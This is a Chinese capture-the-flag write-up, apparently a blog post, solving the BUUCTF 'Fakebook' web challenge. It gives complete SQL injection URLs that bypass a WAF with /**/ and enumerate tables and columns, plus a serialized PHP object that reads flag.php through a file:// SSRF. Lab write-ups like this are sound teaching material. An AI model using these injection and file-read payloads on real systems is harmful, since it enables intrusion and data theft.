美文网首页
BUUCTF-[网鼎杯 2018]Fakebook 记录

BUUCTF-[网鼎杯 2018]Fakebook 记录

作者: 低调求发展 | 来源:发表于2020-11-16 12:30 被阅读0次

25.[网鼎杯 2018]Fakebook

首先打开界面如下,有两个按钮login、join,试了下login登录不进去,

然后用join进入了

发现test为链接,随之点开,发现no参数,尝试注入。

说明存在注入的

order by 有4个字段

发现有waf,可以用/**/绕过

爆表名:爆出:users

http://43701ca6-b883-417f-b053-1ae3c48fbc60.node3.buuoj.cn/view.php?no=-1 union/**/select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()

爆列名:爆出:no,username,passwd,data

http://43701ca6-b883-417f-b053-1ae3c48fbc60.node3.buuoj.cn/view.php?no=-1 union/**/select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema=database() and table_name = 'users'

报字段:

data是我们注册时反序列化的数据

后面没思路,看了下wp,原来robots.txt源码

查看源码:

大概意思是前方暴露出flag.php路径,然后通过ssrf读取到flag。

payload:'O:8:"UserInfo":3:{s:4:"name";s:4:"test";s:3:"age";i:1;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'

因为data在第四个字段,所以放到4输出

查看源码得到base64数据

解密得到flag

相关文章

  • BUUCTF-[网鼎杯 2018]Fakebook 记录

    25.[网鼎杯 2018]Fakebook 首先打开界面如下,有两个按钮login、join,试了下login登录...

  • 2018-网鼎杯-第一场-Web-Fakebook

    复现环境 https://buuoj.cn/challenges 考察知识点 访问robots.txt可以得到源码...

  • BUUCTF-[强网杯 2019]随便注 记录

    [强网杯 2019]随便注 进入该界面 正常步骤注入: 存在注入,order by 看看几个字段,3返回错误,说明...

  • 2018 网鼎杯 | pwn wp

    fgo 漏洞点 :delete 函数 uaf 利用过程:add(0x10) 两个组合 0x10(pointer)...

  • [网鼎杯] writeup

    网鼎杯 这次还行很开心 挺满足 题目列表 web facebook 首先访问robots.txt 存在备份泄露,把...

  • BUUCTF-[护网杯 2018]easy_tornado 记

    [护网杯 2018]easy_tornado 首先打开界面,看到三个链接,分别点一下 根据三个链接提示,flag在...

  • [网鼎杯线下] web && droopy 靶场

    网鼎杯线下web && droopy 靶场 这次网鼎打完啦,还是觉得自己太菜了半决赛第二也是抱了pwn爷爷的大腿(...

  • 网鼎杯blend wp

    记录一次菜的抠脚的学习过程 题目是一个bin文件,首先通过file命令看一下文件格式 拖到IDA Pro 可以识别...

  • 网鼎杯(4)-pwn

    题目链接 保护还挺多 主要漏洞点: stack函数有栈溢出,还有puts函数可以泄漏栈的东西 secret函数由于...

  • 网鼎杯(1)-guess

    明显的栈溢出漏洞,但是开了canary保护但是flag被读取到栈上,所以可以用SSP(Stack Smashes ...

网友评论

      本文标题:BUUCTF-[网鼎杯 2018]Fakebook 记录

      本文链接:https://www.haomeiwen.com/subject/yxnumktx.html